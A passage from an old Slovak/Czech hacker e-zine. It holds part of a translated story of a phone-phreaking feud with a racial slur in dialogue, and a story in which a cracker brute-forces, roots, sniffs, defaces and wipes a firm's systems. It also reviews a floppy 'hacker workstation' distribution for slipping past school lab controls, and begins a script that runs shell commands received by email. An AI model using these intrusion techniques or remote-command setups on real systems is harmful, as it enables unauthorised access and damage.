je na linke. Zrazu sa do konfery prida dalsi hlas, prida sa k skupine
uprostred vety. Novy priselec nema prizvuk bezny v tychto koncinach.


"Yo, tot je Dope Fiend z MOD", hovori novy priselec jasne ne-belosskym,
ne-stredno-triednym, ne-Texaskym prizvukom.


Jeden z Texasanov (ktovie kto ?) sa nasere.


"Vykopnite toho negra z linky!"


Novy priselec je ticho.


Vlastne je odrazu teraz cela konferencia potichu, vsetci ti kecajuci
chalani, ktori vyrastali tvrdo a chladno proti vyslovenemu slovu.
Ako keby dostali facku po tvari. Ubehne zopar sekund. Kto chce k tomu
nieco dodat ?


A je to. Tak jednoduche ako vyslovit jednu nadavku. Rasovy epitet
sa okamzite presunie na sever po stovkach kilometrov kablov, zvoniac
v uchu Johna Leeho, ktory sedi za svojim Commie 64 vo svojom Brooklynskom
byte na druhom konci linky.


To slovo udrie Johna ako baseballova palka.


"Vykopnite toho negra z linky!"


Potom novy priselec hovori s inym prizvukom, a slova ktore povie bielym
chalanom z Texasu su nasledovne: "Cau. Tu je Corrupt."


Kto to povedal to slovo ? Teraz je to uz jedno; nic uz nebude ako pred tym.
Ani pre Chrisa a Scotta, ani pre chalanov z MD, ani pre celu komunitu
ktora vytvara hackerske podsvetie.


Tymto slovom bola vyhlasena vojna.


Chris Goggans je nepriatel Johna Leeho - a navzdy bude. Ale teraz v polovici
90-tych rokov a po tejto nepriatelskej konfrontacii, John nepozna svojho
protivnika ani podla mena "Chris". Iba vie ze je to Erik Bloodaxe.


Ale John sa rozhodol ze riadne otravi zivot svojmu nepriatelovi. Najprv sa
ale John musi dozvediet skutocne meno Erika Bloodaxa. Chris je tak notoricky
znamy v podsveti, ze to Johnovi ani dlho netrva, kym ziska informaciu ktoru
potrebuje.


A to je fajn vec, kedze nemozes zavolat na informacie v Texase a spytat sa
na priezvysko Bloodaxe. Takze John obide celu informacnu linku. Namiesto toho
zavola do pocitaca Southwestern Bellu, odtial sa prihlasi na swicht a jednoducho
si zisti Chrisove telefonne cislo v jeho troj-izbovom predmestskom dome, ktory
ma prenajaty v severnom Austine.


A potom zacnu telefonaty.


Obcas pouzije John svoj poulicny prizvuk aby nasral Chrisa. Telefonaty
su nekonciace. Nepomoze zavesit aparat. Sotva polozi sluchatko a telefon
hned znova zazvoni. Chris ho musi nechat zveseny cele hodiny. Niekedy,
ked otravuju Chrisa, volajuci povie, "Tu mas, pokecaj si so svojim kamosom,"
a potom pred tym ako moze Chris zavesit pocuje klik a Scott sa pripoji
do hovoru proti jeho voli a povie "Haloo? Haloo? Kto je to ?"


Podla Chrisa spada tento druh otravovania definitivne do kategorie chovania
ktore je totalne neakceptovatelne. Je to druh spravania proti ktoremu
by mohol ochranovat, keby mal svoju vlastnu bezpecnostnu firmu. Chcel uz
dlhsie spravit taku firmu, ale prave teraz sa jeho plany zhmotnuju.


On a Scott sa o situacii dlho bavia, a dokonca uz aj vymysleli nazov
pre firmu ktoru chcu vytvorit. Comsec Data Security je cele meno,
ale Chris a Scott to volaju zjednodusene, Comsec.


Jedneho dna pocas zimy 1990, Chris si stiahne kopiu History of MOD, subor
ktory napisal Eli na oslavu narodenin MOD. Chris citi ze bol dost provokovany;
chalani MOD sa pripojili na ustrednu ktora obsluhuje jeho stanicu a prepli
mu medzimestske hovory zo Sprintu na AT&T. Chris o tom nevie az dokial
sa nesnazi volat medzimesto. Nepocuje znamy klik. Takze potom, samozrejme,
musi volat telefonnej spolocnosti. Skuste to vsetko vysvetlit uradnikovi
v kancelarii a pochopite preco je taky nastvaty.



ja som slubil v minulom cisle ze to v tomto dokoncim, ze ? juj ale nestihol som to cele
prelozit, ale v tom buducom cisle to isto iste uz dokoncim :)

pajka



navrat na obsah



abednego



Tento pribeh bol napisany podla naozajstnej skutocnosti (az na FBI), osoby su
s pochopitelnych dovodov zmene.


Jedneho pekneho dna sedel pri pocitaci zavislak Abednego a prihlasil sa na IRC.
Po pripojeni na kanal zaoberajuci sa OS Unix, sa "poobzeral po okoli",
koho este nepozna a kde by mohol naviazat nejake kontakty. Hladal niekoho,
s kym by si mohol pokecat, nieco noveho sa naucit. Vypadalo to ako v kantine
vo Hviezdnych Vojnach.


Votrel sa do rozhovoru ostatnych a po chvili kecania o nicom, po tom co
uz pourazal polovicu kanala, zacal vyckavat na nejaku obet pomocou,
ktorej by mohol vyprovokovat "flame war". A prave vtedy to prislo. Z
cisteho kabla sa zjavil clovek s nicknamom Dogbery. Slusne sa opytal, ako by
mohol napisat driver pre jeho pracovnu stanicu. Abednegova reakcia bola:
,, RTFM! ''. Co znamena Read The Fucking Mamual. Ostatni dali svoj nesuhlas
najavo velmi "hlasnymi" urazkami na Abednegovu stranu. Ako sa zdalo, tak asi
bola tato otazka na Abednega trochu moc a preto sa stiahol a nechal ich nech
si len nadavaju. Ale Dogbery si tiez nedal pokoj a urazil Abednega strasnym
slovom: ,, Newbie! ''. S Abednega vyleteli plamene hnevu:). Okamzite sa
chcel pomstit!


Ako tazky zavislak pouzil finger aby si zistil Dogberyho E-mailovu adresu
a vyplulo mu to Dogbery@refrigerus.com. Okamzite ho napadlo, ze by mohol byt
jednym z manazerov/programatorov tejto firmy. Aby si overil svoje
domnieknky, pouzil telnet na mail server, a prikaz expn root@refrigerus.com
vydal svoje ovocie. Zistil, ze Dogbery je hlavnym spravcom systemu.
Jeho nervozita narastala, Abednego pustil strobe a cakal na vystup. Vedel,
ze vysledkom moze byt miesto kadial sa moze dostat dnu. Ale strobe zachytil
Dogberyho firewall. Velmi dobre nastaveny software si preluskal hlavicky
paketov prichadzajucich do siete a vyhodnotil ich ako utok.


Od tejto chvile firewall z refrigerus.com zacal bleskovo posielat kopy
"hlusiny", teda kopu nepotrebnych udajov, plus nahodne pismena naspat na
ABednegov pocitac. Uplne ho zahltil (zafloodoval). Zaroven bol firewall tak
nastaveny, aby poslal E-mail na ISP utocnika, co aj urobil. Mail obsahoval
upozornenie, ze sa niekto pokusa naburat do systemu. O par minut Abednegov
ISP uzatvoril jeho konto s odvovodnenim, ze bol poruseny zakon o pocitacovej
kriminalite. Ale jeho to vobec nerozhadzalo, ved to konto, ktore mu zrusili
bolo iba jedno z mnohych, ktore si vyrobil ked sa dostal do systemu ISP.
Jedine co ho rozculilo bolo to, ze mu to zrusilo IRC. Ohen v nom znovu
zblkol, zacal tuzit po pomste. Jeho dalsi krok bol spustit stealth scanner.
( Pre tych menej informovanych stealth obchadza "three-way handshake" a na
skenovany stroj posiela iba FIN a RST pakety) Velmi dobre vedel, ze sa v logoch
po nom, pri tomto sposobe skenovania, neobjavia ziadne zaznamy. Ale
nedomyslel to dalej, pretoze vo FIN pakete je dostatok dat na ziskanie
identity utocnika.


Abednego sa rychlo pozrel na web aby si nasiel nejake dalsie resp. lepsie
veci na utok. Zacal hladat stealth scannery na undergroundovych strankach.
Kedze C -cko moc neovladal, tak sa spoliehal, ze mu bude stacit, ked si
zdrojaky skompiluje.


Zatial mlady Dogbery si zvolil inu cestu. Potom ako sa spriatelil s
technikou u jeho miestneho ISP, sa naucil ako spravovat siete. Velmi davno
pred tym, ked hraval hry od rana do vecera, sa aj naucil ako sa do nich
dostavat. Co sa mu vyplatilo ked nastupoval u ISP a pomahal im zabezpecit
ich siet. A kedze bol sikovny ISP si ho nechal a zamestnal ho na ciastocny
uvezok pokial si nedokonci vysoku skolu. A tu Abednego neodhadol spravne
situaciu, Dogbery bol stary veteran/hacker.


Na usvite, Abednego dokoncil prave kompilaciu. O par minut mu vydal scanner
svoje vysledky, ale nebolo to nic moc. Iba ssh demon a web server. Ale
prave ked prestaval dufat scanner narazil na port 31 659.


O tomto case este Dogbery hlboko spal. Jeho program EtherPeek (sniffer
instalovany na domene refrigerus.com) detekoval port scan. Dogbery vtrhol do
kancelarie aby sa pozrel co sa deje, popozeral si vypisi na jeho konzole.
Abednego prave dostal chut ist na stroj cez port 31 659, ale prave
"nejaka" hackerska intuicia mu povedala, ze by sa mal radsej vratit niekedy
inokedy, niektoru inu noc. Teda Dogbery nespozoroval na svojom pocitaci
ziadnu inu aktivitu a preto usudil, ze utocnik uz asi skoncil.


Kuriozne na tom bolo, ze z "neuzitocneho" utoku zacal Dogbery analyzovat
data a logy az nakoniec zistil z FIN paketov utocnikovu adresu.


Vyzbrojeny tymito infornaciami poslal e-mail Abednegovmu provajderovi a
chcel si od neho vyziadat blizsie informacie ohladom konta. Ale sysadmin u
provajdera mu odpovedal, ze taketo informacie mu poskytnut nemoze, pretoze
to bol iba scanner a to nie je porusenie zakona!


O tri noci neskor sa Abednego rozhodol, ze dokonci nahanacku. Ale ked sa
logol u ISP, tak ho nasiel zrusene s poznamkou, ze mu expirovalo heslo. Tak
zavolal provajderovi a ten mu oznamil, ze konto bude zrusene vzhladom na FIN
attack. To ho ale riadne dopalilo. Okamzite zavolal inemu providerovi a o
par minut bol zasa na net-e. Na klavesnici si napisal jednoduchy prikaz
whois refrigerus.com. Odpovedou mu bol zaznam, ze vlastnikom je spolocnost
REFRIGERATORS R Us. Teraz sa rozhodol, ze skusi stastie cez port 31 659.
Napisal telnet reefrigerus.com 31569. Po spojeni mu na obrazovku vyletel
napis "You lamer! Did you really think this was a back door?!" Potom mu
este poslal par nezmyselnych pismem a nakoniec na neho poslal nesteu.
Zaroven program poslal mail provajderovi, ze sa niekto pokusa naburat
system, a Abednegovo spojenie o par minut skoncilo, s oznamenim, ze vzhladom
na pocitacovu kriminalitu bolo konto zrusene.


Jeho rozhodnost pomstit sa stupala. Zacal kruzit okolo firewallu ako
besna macka, z jedneho z mnozstva hacknutych kont u jeho ISP. Zacal si
zoradovat informacie o pocitacoch v domene. Pustil si nslookup ale
nevytiahol ziadne uzitocne informacie. Uz skormuteny si pustil IP scanner
aby oskenoval IP adresy okolo refrigerus.com. Presiel asi 50 adries ale bez
zaruky, ze su v okoli refrigerus.com, ale aspon nieco.


Dalsi prikaz bol whois, aby zistil ktore ine domenove mena su
registrovane na firmu REFRIGERATORS R Us. Nasiel adresu refrigeratorz.com,
ktora bola numericky rozna od refrigerus.com a jeho IP scanner nasiel este
dalsich 5 IP adries ciselne blizko refrigeratorz.com.


Abednego sa nalogoval na dalsie a z neho na dalsie konto, bolo to jedno z
mnozstva jeho hacknutych kont, aby mohol pustit viac FIN scannov. Skoval
svoje procesy cez jeden z mnozstva root kitov potulujucich sa po webe.
Napriek tomu si este nainstaloval Trojskeho kona aby pri akomkolvek naznaku
zmazal vsetko co by nejako s nim suviselo (logy a tak....). Z tohoto miesta
zacal skenovat dalsie pocitace z domeny refrigerus.com a refrigeratorz.com.
FIN scanner presiel aj napriek firewallu skoro ku kazdemu z nich.
Samozrejme, ze EtherPeek nelenil a aktivoval Dogberyho pager!


Dogberry, potom co doletel do prace, zasa krvopotne analyzoval logy aby
zistil povodcu FIN scannu, co sa mu aj podarilo a upozornil Abednegovho ISP
na jeho 3 hacknute konto. Ale root kit si uzrobil poriadne svoju pracu, a
skryl Abednega od odporneho systemaka. A Abednego s kludom presiel z stealth
scannera na strobovanie, dufajuc, ze najde IP-cko, ktore firewall nechrani.
Ale nevsimol si pritom mnozstvo dat, ktore zacal chrlit firewall, a nakoniec
samozrejme nezabudol upozornit Abednegovho provajdera na jeho hacknute
konto. Okamzite sa rozhodol, ze tvrdo sa odpoji od Internetu. Ked jeho
spojenie zamrzlo, pomyslel si, ze nie je ziadna elegantna cesta ako firewall
obist.


Ako si domyslel, ze niektore pocitace z REFRIGERATORS R Us mozu byt aj
pracovne stanice nejakych zamestnanych kockacov. Co v nom prebudilo aspon
aku taku sancu, ze niektori z nich pocas bezsennych noci bude chcet
pracovat. Ved vzdy sa nejaky workoholik najde.


S chutou sa pustil do realizacie svojho noveho napadu. Pustil si program
ShockDial (je to wardialer t.j. program, ktory vytoci zakladne cislo do
firmy a potom prejde vsetky mozne koncove kombinacie). Potom o 2:57 A.M.
wardialer spustil utok a na Abednegovom monitore sa zobrazila potesujuca
sprava:,, Refrigerators R Us Marketing Department. Irix 6.3''. ''AA konecne
nieco'', pomyslel si. Dalsia jeho strategia je brutalny utok a to chce
nasadit program, ktory by sa opakovane prihlasoval do Irixu a skusal by
passwordy pre roota, dufal pri tom, ze zopar workoholikov bude mat povoleny
pristup na pocitac aj na roota.


"Passworder" zacal zo vseobecnymi slovami a menami, ktore byvaju obvyklou
volbou. Takyto proces moze trvat mesiace. Ale zrazu ho vyrusilo pipnutie, a
o 5:00 A.M. bol na svete prvy password a to "nancy". "Yes!", vykrikol
Abednego. Okamzite si zabezpecil svoju poziciu, tym ze si ftp-ckol root kit
a nainstaloval si ho. Nastavil ho tak, aby logoval vsetko co sa deje na
sieti (sniffer) a aj aby logoval co kto napise na klavesnici. O par minut
Abednegov sniffer zaznamenal uspech a to vo forme user:revenge
passwd:DiEd0gB. Pracu, ktoru dnes Abednego robil nebola nijako narocna. Na
hacknutom stroji si natukal who aby si zistil odkial ide user revenge a
pocitat mu to ochotne povedal:


6:03 am up 123 days , 1 users, load average: 0.00, 0.05, 0.07
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
revenge ttyp2 picasso.refrigeratorz.com 6.00am 0.00s 2.57s 0.16s -sh

Este toto rano prisiel pravoplatny vlastnik servera picasso a nezistil nic
co by indikovalo utok. Abednegov root kit pracoval dobre :).


Na druhej strane, Dogbery po odhaleny logov zistil masivny utok z
Internetu. Spomenul si na predosli FIN scann, ale zistil, ze ma prilis malo
informacii aby mohol nieco podniknut.


O dve noci neskor sa Abednego pripojil do siete aby si pozrel logy z
picassa. Ale na jeho prekvapenie vsetko co jeho sniffer zaznamenal bolo
kryptovane no napriek tomu, jeho keystroke zaznamenal niekoho, kto sa chcel
lognut na pocitac menom fantasia. A teraz je Abednego cely rad, ze ma
username a password. Sezam otvor sa! ;)


Abednego zistil, ze ten pocitac (fantasia) je SPARC workstation pouzivana
na renderovanie animovanych sekvencii. Pretoze sa mu malilo zacal nahanat
passwd subor, dufajuc, ze nude moct nejake pouzit na vniknutie z vnutra
siete. Ale jedine co nasiel bol shadowovany passwd subor. Zakerne sa usmial
a spustil ftp-cko, skusal ho prinutit spadnut, a tak ziskat core file.
Bingo! Core dump! No ale podarilo sa mu ziskat zakodovany shadow file, takze
ho cakalo este vela prace a preto spustil svoj password craker, ktory bude
zaneprazdneny luskanim suboru zopar dni.


Ale jeho nedockavost nemala hranic. A tak zacal pracovat na exploite pre
tento SPARC. Bol to jeden z mnoha typickych buffer overflow-ov. Cely
nateseny zo svojho uspechu zacal zahladzovat stopy po jeho velmi "pilnej"
praci z minulej noci. V hlave sa mu vynorila jedna myslienka:,, Moze sa
niekto dostat na fantasiu z Internetu??'' a tak natukal last -100.
A videl par ludi, ktory isli z vonku cez domeny adegency.com (user:vangogh a
nancy), z ktorej firewall dovoluje logovanie. Ale po unavnej noci si siel
radsej pospat, jeho adrenalin bol velmi vysoky. Isiel spat z vedomim, ze je
blizko toho aby vlastnil REFRIGERATORS R Us.


Nasledujuce poobedie si Abednego urobil male zahrievacie kolo, dostal sa
do adagency.com. Nazaciatok pouzil IP spoofing aby pocitac zaznamenal
falosnu IP-cku. Posielanim SYN paketov a analyzovanim ACK/SYN odpovedi
nasiel potom vzorec podla, ktoreho sa generovali sequencne cisla. Rychlo
este nainstaloval sniffer na adegency a pouzil ssh na spojenie s fantasiou.
Na fantasii napisal netstat aby si pozrel aktivne spojenia a nasiel pocitac,
ktory mu pri jeho predchadzajucich akciach unikal, t.j.
admin.refrigerus.com. Teda to by mohlo byt miesto odkial Dogbery riadi
system!


Medzicasom Abednegov pocitac prelomil dalsiu kombinaciu (passwd) pre
uzivatela, ktory mu fungoval aj na ostatne pocitace v sieti, nielen fantasiu.
Prave vyhral dva krat. Podarilo sa mu uchovat si password usera vangogha
na firemny Web server. Popri tom jeho sniffer zaznamenal nieco, bola to Nancy,
pripojila sa z domu cez dial-up a za pomoci jej back dooru sa logla a ziskala
rootovsky shell. Back door bol jej a pekne skryty za pomoci root kitu.
Ihned sa vydal po Nancy-nych stopach a logol sa aj na ako root a vydal sa
na vylet po vsetkych pocitacoch vo firme, napriek tomu, ze Dogbery bol poctivy.
Ale napriek rootovskym pravam sa mu nedarilo zmenit passwordy pre jednotlive
pocitace, pretoze to nebolo mozne. A tak sa vratil naspat na firemny web
a zmenil tam webovske stranky, zmensou upravou, ktora obsahovala udalosti
poslednych dni ;).


Ale podme naspat do REFRIGERATORS R Us, Dogbery bol v praci uz zasa celu noc
a hral sa z logmi. Objavil v nich, ze ludia z marketingoveho oddelenia mali
neuveritelne vela spojeni zo servera adagency. Rozhodol sa, za na druhy den
sa bude musiet opytat admina na adagency, bol to jeho kolega, ktory mu niekolko
krat pomahal instalovat nejaky software.


Prave ked bol na odchode domov, uz konecne sa chcel vyspat, zazvonil telefon
v jeho kancelarii. Bol to jeden zo zakaznikov firmy a stazoval sa na to,
ze na ich webovskej stranke je namiesto informacii porno. Okamzite sa vrhol
k browseru a pozrel si znicenu stranku, dalsie co urobil, bolo to, ze vytrhol
ethernetovy kabel a odpojil tym celu siet od Internetu.


Abednego bol velmi sklamany, ze jeho dielo vyslo tak skoro nazmar. A spomenul si,
ze na serveroch zanechal az prilis vela zaznamov o svojom vyvadzani a preto sa
rohodol, ze ich pojde zmazat. Pouzil znamu cestu a to dial-up na picasso,
nastastie Dogbery o tejto ceste este nevedel. Nedal si s tym moc namahy,
preformatoval cely disk adminovho pocitaca ;).


Ked prisiel Dogbery k pocitacu, uz na nom nic nebolo. Neostavalo mu nic ine
ako nan instalovat cely system znova. (Ale Abednego nevedel, ze zostal v logoch
EtherPeeku beziaceho na vedlajsom Machintoshi.)


Abednego sa potmehutsky usmieval nad svojim vitazstvom a popri tom floodoval
refrigerus.com nezmyselnymi datami. Teraz sa na Dogberyho valili z kazdej strany
hlasenia jeho nadriadenych, ze zo strankou nie je nieco v poriadku. Zaroven
mu volal jeho sef, ze sa nemoze z hotelovej izby pripojit na mail server.
Absolutne znechuteny Dogbery musel ist este rano az za viceprezidentom
pre technologie pre povolenie, aby mohol vycistit kazdy pocitac v ich sieti,
musel preinstalovat software na kazdom pocitaci a vsetkym zmenit passwordy.
Ale celkova previerka systemu si bude vyzadovat hlbsiu analyzu a vypnutie systemu
na niekolko dni.


Od tohoto casu boli Abednegove destruktivne exploity priamou vazbou medzi nim
a hackovanim.


Dogbery nezahalal a chcel ziskat nejake udaje a tak zavolal na marketingove
odelenie a pohovoril si s jeho riaditelom. Potom si nabootoval svoju adminovsku
masinku, na ktoru natiahol novy system. Vedla na Windows NT servery si spustil
T-sight, program ktory moze monitorovat cinnost kazdeho pocitaca v sieti.
A teraz spustil Dogbery svoj "kolotoc". T-sight bude teraz davat pozor na celu
siet a pripadneho utocnika presmeruje do "vezenia". Tam moze byt monitorovany
a sledovany. Spolu so svojimi kamaratmi vytvoril vo vezeni podobu jeho systemu
a este do neho pridal "VELMI" dolezite financne udaje (cisla platobnych kariet
a take veci okolo penazi :) ).


O dve noci neskor, ked rucicky na hodinach ukazovali 8:17 p.m. sa niekto poku-
sil o utok na admin.refrigerus.com. Bol to Abednego. Preco sa vratil? Jeho kama-
rati z hacker undergroundu videli stranku a velmi sa im pacila, a aj poslali
list do CNN. Publicita mu stupla do hlavi! :( A preto takto "podgurazeny" sa
vratil a chcel z toho vytlct viac.


Ale dnes si nedaval taky pozor a logol sa priamo na "demo konto" ISP a
odtial priamo na adagency, aby mal rychlejsi pristup na back door na fantasii.
Na admin.refrigerus.com padol do vezenia vytvoreneho T-sightom, a strasne za-
cal tahat udaje o ktorych si myslel, ze su velmi dolezite.


Dogbery bol tiez zamestnany. Rychlo analyzoval data z T-sightu, zistil password
na fantasiu, cim ziskal moznost spatnej cesty na adagency. Zavolal adminovy na
adagency.com, bohuzial ho v praci uz nezastihol ale nasiel ho v kaviarni,
kde sa zabaval so svojou priatelkou. Ten mu prislubil pomoc pri patrani.


Zatial co sa Abednego snazil dostat velky subor dat, mysliac si ze ziskal
poklad, Dogbery nainstaloval sniffer na adagency.com. Takto sa pomalicky dostal
na Abednegove rootkity pretoze on mal vsade ten isty password, ktory sa ale
jemu podarilo odsniffovat. Par minut pred tym ako Abednego dokoncil download sub-
boru, sa Dogberimu podarilo uspesne vystopovat jeho pocitac az cez jeho ISP.


No a uz mal dost informacii aby ich predal FBI (KGB). Ta ziskala po niekolkych
dnoch z telefonnych logov identifikaciu Abednega. S dostatocnim poctom dokazov,
plus dokazy z EtherPeeku, mohlo zacat vysetrovanie a bolo aj vznesene obvinenie.
Potom FBI uskutocnila domovu prehliadku u Abednega a skonfiskovala pocitac.
Jeho disk obsahoval vsetko. Ale aj tak sa mu podarilo niektore udaje zmazat,
ale laboratoriam FBI sa ich aj tak podarilo extrahovat. Ako aj udaje o plieneni
systemov ISP a niekolko bank na severe krajiny.


Abednego bol obvineni z nezakonneho ziskavania dat, pocitacovej kriminality.
Abednego dostal dva roky vo federalnej veznici. Cest jeho pamiatke! :)



mos, mos(at)phuture.sk

idea by carolyn p. meinel


navrat na obsah




00000001000001020061730200619240
pajkus
 pajkus      03.03.2004 - 13:28:11 , level: 1, UP   NEW




::::::::::. :::::::.. :::.,:::::: ::: ... . :
`;;;```.;;;;;;;``;;;; ;;;;;;;'''' ;;; .;;;;;;;. ;;,. ;;;
`]]nnn]]' [[[,/[[[' [[[ [[cccc [[[ ,[[ [[,[[[[, ,[[[[,
$$$"" $$$$$$c $$$ $$"""" $$' $$$, $$$$$$$$$$$"$$$
888o 888b "88bo,888 888oo,__ o88oo,.__"888,_ _,88P888 Y88" 888o
YMMMb MMMM "W" MMM """"YUMMM""""YUMMM "YMMMMMP" MMM M' "MMM

prielom #10, 9.1.99, prielom(at)hysteria.sk, http://hysteria.sk/prielom/




obsah



intro

brutalware

inet cez mobil

novy shell pro windows

dns spoofing

styl formatovani zdrojovych textu jadra linuxu

valka elektronickych gangu

je mi to jedno







intro



nasiel som koniec sveta. hned sa mi to zdalo podozrive, ked sa mi
v aute polhodinu pred tym ako som TAM dorazil natrvalo stratil signal
na mobile a nepomahal ani osvedceny recept, to jest vytrcit antenu
v smere predpokladaneho nalezu najblizsej bts-ky a v pravidelnych
intervaloch plieskat mobil o pristrojovu dosku. rozhodnutie stravit
romanticky vikend na samote na vidieku neovplyvnilo samozrejmost pribalit
si notebook a modem. ked som po par testoch pripojenia
pochopil ze ma caka vikendove surfovanie letovou rychlostou 1200 baudov
cez analogovu ustrednu s pulzovym dialom, pochopil som ze som asi
fakt na konci sveta. pripomenulo mi to ale stare dobre casy zaciatkov
internetu... taka nostalgia... surfovanie pri rychlosti 1200 baudov je
romanticke - skuste si to - pekne vidite ako vam naskakuju jednotlive
pismenka do okna telnetu..



asi to je tou nostalgiou... rozhodol som sa konecne pozliepat nove
cislo prielomu.. po dost trapnom osmom cisle som trucoval a povedal som
si ze ked to nema stat za to, tak radsej netreba nic pustat do eteru.
potom prisiel ten forik s neexistujucim deviatym cislom, ktore ziskalo
obrovsku popularitu vdaka tomu ze vobec neexistovalo...


inak co sa tyka toho maleho cgi-binu na uvodnej stranke prielomu, do ktoreho
sa vpisuje e-mail pre automaticku notifikaciu pri novom cisle - musim vam
oznamit ze sa mi uspesne podarilo vymazat subor s e-mailami ktore tam
boli zadane... takze pokial ste sa tam uz raz zaregistrovali, musite to
spravit este raz..


pajkus, 9.1.99, libichava



brutalware



Je to pomerne nedavno, co se na hysterce objevil novy projekt: Brutalware
Linux. Na adrese
http://hysteria.sk/brutalware/ je mozne stahnout jeho prvni
funkcni verzi.



O co se jedna? Brutalware Linux je, jak jeho autori uvadeji, disketova
distribuce, pomoci ktere muzete bezne PCcko promenit v nebezpecnou
hackerskou workstation. Nepotrebujete nic instalovat, proste prijdete k
pocitaci, zapnete, vlozite do mechaniky nejdriv bootdisk, pak jeste rootdisk
a tzv. supplementary disk, a je to.
Diky tomu prijde Brutalware ke slovu hlavne ve skolnich labech, kde
je klasicky windozacky nebo novellacky login prompt, aniz by nekdo
pocital s tim, ze si muzete poridit vlastni operacni system a elegantne tak
proklouznout pod cetnymi nastrahami nezdolnych administratoru. Ziskate tim
v podstate anonymni pristup na internet, a k tomu mate plno uzitecnych
nastroju primo na lokalnim pocitaci.



Brutalware Linux dokonce pocita s moznosti, ze bootovani z disketove
mechaniky je zakazano v BIOSu a BIOS je chranen heslem - predpokladejme ze
nefunguji defaultni hesla. Jadro systemu se zavadi pomoci LOADLINu primo
z MS-DOSu, takze zadne bootovaci mechaniky nepotrebujete.
Jediny problem je se siti. Podle readme fajlu je filozofii Brutalware
vytvoreni maximalne prenositelne distribuce, takze neni mozne vytvaret fixni
skripty na konfiguraci site. Verze 1.0 pocita s tim, ze ve vetsine labu je
pouzito dynamicke pridelovani IP adresy pomoci BOOTP serveru, takze defaultni
konfigurace probiha prave timto zpusobem. Pokud nemate bootp server, nezbyva
nez otravne konfigurovat sit rucne. To mi prijde jako velka nevyhoda, autori
by meli do distribuce pridat aspon jednoduchy skript na rucni konfiguraci.
(Nicmene prozradim, ze sniffovat provoz lze i bez nastavene site ;)



Na disketach najdete standardni arxivove utility idealni pro auditing site:
genialni portscanner nmap2, ktery krome mnoha skenovacich technologii umoznuje
i zjisteni verze operacniho systemu pomoci 'fingerprintingu', jednoduche
cuchadlo linsniffer, interaktivni sniffer s grafickym interfejsem Sniffit,
spoofer/hijacker konexi Juggernaut. K detekci sniffujicich okolnich pocitacu
se hodi neped, pokud se chcete seznamit s hezkou slecnu vedle vas, muzete
ji pomoct nastartovat pocitac shozeny pomoci targy - multinukeru
zvladajiciho velke mnozstvi dosud znamych DoS utoku.
Hackerske kolektivy mohou pouzit redirektor, takze spojeni vypada jako z
jednoho zdroje. Svoji praci mohou koordinovat na elitnim chatu, ktery se na
diskety podarilo nacpat, a ktery se defaultne spusti na portu 7000 (ze by
inspirace hysteria-talkerem?). Pokud k tomu budete mit na skolnich 386kach
odvahu, muzete zkusit cracknout nejaka hesla pomoci johna, ktery je na
diskete i s celkem ucinnym slovnikem nejcasteji pouzivanych hesel.
Samozrejmosti jsou sitovi klienti - ftp, telnet a ssh.
Suitu programu zavrsuje jeden sympaticky nesmysl. Je jim shellovsky
skript "/usr/src/ryby", ktery po spusteni pouze vypise text "Prilis mnoho ryb".
Jestli to znamena, ze autori jsou vegetariani a ryby jim uz lezou na mozek tak,
ze programuji takove silenosti jako Brutalware Linux, nevim, ale tohle se
jim povedlo.



Kazdopadne to vypada jako slibne se vyvijejici projekt - nevahejte a
sosejte, Brutalware je k dispozici na adrese http://hysteria.sk/brutalware,
jako (skoro) vse co neni od Microsoftu samozrejme zdarma. Pokud se vam bude
Brutalware libit, najdete nejakou chybu nebo se vytasite s nejakym napadem,
piste autorum na adresu brutalware(at)hysteria.sk.



newroot, newroot(at)hysteria.sk


navrat na obsah



inet cez mobil



posielanie e-mailov z mobilneho telefonu cez SMS v sieti Globtel funguje
uz zopar mesiacov. eurotel este oficialne takuto sluzbu neposkytuje (?),
ale uz dost dlho funguje skusobne zasielanie e-mailov cez cislo 111. staci
napisat sms-ku vo formate user!server.sk text text text text, poslat
to na cislo 111 a zadany text sa posle na adresu user@server.sk, ako odosielatel
je uvedene vase cislo 421903xxxxxx@sms.eurotel.sk. takisto bezplatne funguje
posielanie sms sprav z internetu cez e-mail, staci poslat e-mail na adresu
xxxxxx@sms.eurotel.sk. neovladam bohvieako sluzby ewrotelu, ale mam dojem
ze tieto sluzby este nie su oficialne zverejnene, zatial to funguje asi
iba skusobne.



www sms brana v ewroteli.



vdaka tymto novinkam je vlastne uplne zbytocna platena sluzba
eurotelu "SMS brana" cez Web. webovska sms brana na euroteli je navyse
zbytocne komplikovana a nezmyselne zlozita (cookies a pod), cielom je zjavne zabranit
automatickemu zasielaniu tisicov SMSiek cez tuto branu, ako sa to stalo pred
rokom, ked ktosi z CzERTu zaslal z lanprojekt.cz nejakych 60000 sms-iek za
jednu noc. nie je vsak problem spravit script na zasielanie sms-iek aj
cez terajsiu webovsku branu ewrotelu, ja sam som si na to spravil scriptik
ktory mal okolo 50 riadkov. osobne sa divim eurotelu ze nespravia uzivatelsky
prijemnu a jednoduchu www sms-branu, ktoru by zabezpecili tak, ze by o tom
legitimny a bezny uzivatel ani nevedel, ale hacker by narazil na stenu - a to
napriklad spravit tu branu tak, aby sa dal nastavit limit zaslanych sms-iek
v danom casovom limite z jednej IP adresy, napr. 50 sprav za hodinu z jednej
IP adresy... normalny uzivatel by si to nikdy nevsimol, ale hacker by dokazal
poslat za jednu noc maximalne zopar sto sms-iek.



ale pome naspat k zasielaniu e-mailov z mobilu. ono vlastne to, naco operatori
tuto sluzbu propaguju, t.j. samotne zasielanie e-mailu z mobilu je podla mojho
nazoru dost blbost. pisat SMSku cez ciselny dial mobilneho telefonu je otrava
a kym clovek napise niekolko-vetovy e-mail, riadne sa zapoti. zasielanie
e-mailov z mobilu vsak umoznuje velmi cool veci, na ktore bezny uzivatel mozno
ani nepomysli. nasleduje par moznosti na ilustraciu...



zasielanie unix prikazov z mobilu



nejdna z najzaujimavejsich veci je posielanie unixovych prikazov priamo z mobilu
na vase unix konto. ja osobne najcastejsie posielam prikazy typu uptime, who,
ps, finger user@server.sk, ping a podobne... technicky je to mozne tak, ze

do domaceho adresara si dam takyto subor .forward:



|/home/pajkus/bin/gsmunix
pajkus


a vsetka posta sa mi okrem ulozenia do mailboxu posle aj do scriptu "gsmunix".
tento programcek najprv pozrie ci je to e-mail zaslany z mojho mobilu a ak
ano, nacita si prikaz, execne ho, a posle mi naspat vypis z prikazu:


#!/bin/sh
# predpokladajme ze moje cislo ewrotelu je 0903 555123 :)

# minimalny pocet pismen prikazu
min=2

# pracovny adresar
adresar=/home/pajkus/bin

# dnesny datum v peknuckom formate, koli zapisovaniu logov
